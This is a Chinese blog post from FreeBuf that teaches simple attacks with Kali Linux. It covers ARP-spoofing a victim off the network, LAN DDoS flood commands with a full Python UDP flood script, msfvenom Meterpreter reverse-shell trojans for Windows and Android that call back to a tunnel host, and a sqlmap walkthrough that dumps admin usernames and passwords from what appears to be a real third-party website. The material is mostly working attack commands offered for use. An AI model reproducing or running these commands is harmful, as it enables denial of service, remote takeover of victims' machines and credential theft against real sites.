freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

利用Kali Linux进行一些简单攻击
2021-04-04 13:52:07

一、arp欺骗断网

arpspoof -i eth0 -t+IPV4+网关

要确认IP转发功能的状态,可以查看/proc文件系统,
使用下面命令: cat /proc/sys/net/ipv4/ip_forward
如果上述文件中的值为0,说明禁止进行IP转发;
如果是1,则说明IP转发功能已经打开。
要想打开IP转发功能,
可以直接修改上述文件: echo 1 > /proc/sys/net/ipv4/ip_forward
把文件的内容由0修改为1。禁用IP转发则把1改为0。

二、内网DDOS

hping3 -S -P -U --flood -V --rand-source +IP


cd DDos-Attack
python ddos-attack.py
IP
端口:80

ab -n 10000000 -c 600 + 网站(端口,目录)

ddos-attack.py脚本如下

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
os.system("figlet DDos Attack")
print
print "Author   : HA-MRX"
print "You Tube : https://www.you-tube.com/c/HA-MRX"
print "github   : https://github.com/Ha3MrX"
print "Facebook : https://www.facebook.com/muhamad.jabar222"
print
ip = raw_input("IP Target : ")
port = input("Port       : ")

os.system("clear")
os.system("figlet Attack Starting")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1


三、Metasploit木马远控

外网:(具体教程搜索一下Sunny-Ngrok内网穿透)
./sunny clientid 你的id

64位(外):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=vipgz5.idcfengye.com lport=10016 -f exe -o haya.exe

64位(内):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe

32位:
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe

android:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=1234 R > root/test.apk

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.101

set lport 1234

exploit

四、SQL注入

第一步:检测注入 sqlmap -u http://tunesoman.com/product.php?id=200
在这里插入图片描述

一直回车即可,最后可检测出版本

在这里插入图片描述

第二步:检测该IP有哪些数据库 sqlmap -u http://www.tunesoman.com/product.php?id=200 --dbs

在这里插入图片描述

此时显示出所有的数据库
在这里插入图片描述

第三步:检测出数据库之后,开始获取它里面的表 (batch的意思是不用一直yes,直接运行到底)

在这里插入图片描述

这时就检测出来了
在这里插入图片描述

第四步:我们来检测一下admin_user表里有哪些字段。(–column列出字段 ,-T后面+表名,-D后面+数据库名)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第五步:这时我们就可以查出这些字段内有什么数据(-C查看字段,–dump是把所有的记录列出来)

sqlmap -u http://www.tunesoman.com/product.php?id=200 -C admin_user_name,admin_user_pass -T admin_user -D db363851433 --batch --dump

此时我们就获取到了所有的数据了,里面包含用户名和密码,这时我们就可以进去它的服务器了

在这里插入图片描述
最后:输入用户名和密码,进入服务器。

# 渗透测试 # 黑客 # web安全 # Kali # kali,渗透基础,信息搜索
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者